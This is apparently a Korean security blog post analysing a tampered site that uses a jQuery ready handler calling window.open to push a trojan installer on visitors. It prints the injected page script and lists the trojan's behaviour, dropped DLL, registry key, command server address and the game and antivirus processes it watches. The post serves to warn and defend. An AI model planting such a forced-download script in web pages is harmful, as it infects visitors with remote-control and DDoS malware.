[사이트 변조] 제이쿼리(JQuery)함수를 이용한 악성코드 다운로드 방식 주의!!

기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여 

접속 된 PC가  취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.

그래서 이전에 기존 사이트 변조와는 다른 iframe, Document.Referrer, Meta http-equiv="refresh"  함수를 이용한 

악성코드 다운로드 방식을 소개 한 적이 있었다.

• [사이트 변조] iframe 태그를 이용한 악성코드 다운로드 방식 주의!!

• [사이트 변조] Document.Referrer 함수를 이용한 악성코드 다운로드 방식 주의!!

• [사이트 변조] Meta http-equiv="refresh" 함수를 이용한 악성코드 다운로드 방식 주의!!

이번에 확인 된 내용은 기존의 html 함수를 쓰지 않고, JQuery 함수를 이용하여 EXE 파일을 다운로드 시키고 있다.

(해당 내용은 9월 24일에 발견 된 내용이나, 포스팅이 늦었다 ㅡ.ㅡ;;)

특히 이전 포스팅에서 윈티비24(Wintv24) 사이트가 변조되어 악성코드가 유포에 대해 기재한 적이 있는데,

이번에 카스게임(cassgam.com)에서 발견 된 파일도 윈티비24(Wintv24)사이트 변조와 동일한 제작자가 유포 한 것으로 추측된다.

□ 관련 내용

• 윈티비24(Wintv24), 사이트 변조(sniffer1.ddns.info)로 인한 "Winpcapture.exe" 악성코드 주의

그럼 간단하게 이번 방식에 대해서 알아보자.

우선 실제 유포가 되고 사이트를 한번 확인해 볼 필요가 있다.

분석중에 알아낸 사실이지만, 해당 사이트는 로그인 기능이 전혀 동작되지 않으며 악성코드 유포를 위해 만들어진 

전형적인 허위 사이트이다.

암튼 유포 되었던 카스게임(cassgam.com)사이트에는 아래와 같은 스크립트가 삽입되어 있었다.

(※ 파일 수집은 9월 24일에 이루어져있고, 현재는 변조 된 스크립트는 삭제 되었음을 미리 알림!!)

전체적인 인터넷 흐름은 아래와 같다.

hxxp://cassgam.com

hxxp://cassgam.com/top.html

hxxp://cassgam.com/jquery.js

hxxp://cassgam.com/cass.html

이 중에서 top.html 속에 제이쿼리(JQuery)함수를 이용하여 EXE를 다운로드 시키는 스크립트가 포함되어 있다.

- top.html 내용

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />

<title>::: CASS :::</titl</title>

<script src="jquery.js"></script>

<script type="text/javascript">

    $(document).ready(function () { window.open('cassgameInstaller.exe', '_self', '', true); });

  </script>

</head>

<body>

</body>

</html>

해당 스크립트에서 가장 중요한 부분은 JQuery를 사용한 $(document).ready(function ()) 부분과

EXE 파일을 다운로드 시키는 window.open() 함수이다.

Window.open() 함수는 새로운 창에서 URL을 생성할 때 사용되는 함수이다.

Window.open(URL, name, specs,replace)와 같은 형식을 갖게 된다.

- URL 파라미터값은 말그대로 URL 주소이다.

- _self specs 파라미터값은 현재페이지에서 URL을 연결 하는 것을 뜻한다.

- ture 파라미터값은 URL 히스토리 목록에 현재 문서 저장 안함을 뜻한다.

따라서, hxxp://cassgam.com/top.html 에 접속하면 "hxxp://cassgam.com/cassgameInstaller.exe" 파일을 다운로드 한다.

(cassgameInstaller.exe 파일은 ESTSoft ALYac에서 Trojan.Dropper.DDoS.Agent.ulo 로 탐지 된다.)

아래의 스크린샷은 실제 카스게임(cassgam.com)에 접속 했을 때의 화면이다.

스크립트를 통해 사용자에게 설치 되는 악성파일(cassgameInstaller.exe)의 행위는 아래와 같다.

- 악성행위

정상적인 svchost.exe 프로세스에 인젝션되어 동작되며, 

원격데스크탑 조작, 사용자 정보 탈취, DDoS, 화면 캡쳐 등 전형적인 NetBot Client의 역활을 수행한다.

- 파일 생성

C:\WINDOWS\system32\RtmqtrC.dll (ESTSoft ALYac : Trojan.DDoS.Agent.ulo)

- 레지스트리 생성

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4

- 서버 접속

180.210.53.113:15963

- 감시 프로세스

PMangAgent.exe

SUTDA.exe

POKER.exe

LASPOKER.exe

marpoker.exe

HOOLA3.exe

HIGHLOW2.exe

BADUKI.exe

POKER7.exe

- 보안 프로그램 설치여부

이스트소프트 알약

레지스트리 : HKEY_LOCAL_MACHINE\SOFTWARE\ESTsoft\ALYac "RootDir"

프로세스 :  AYUpdate.aye

안랩 V3 Lite

레지스트리 : HKEY_LOCAL_MACHINE\SOFTWARE\Ahnlab\V3Lite "InstallPath"

프로세스 : MUpdate2.exe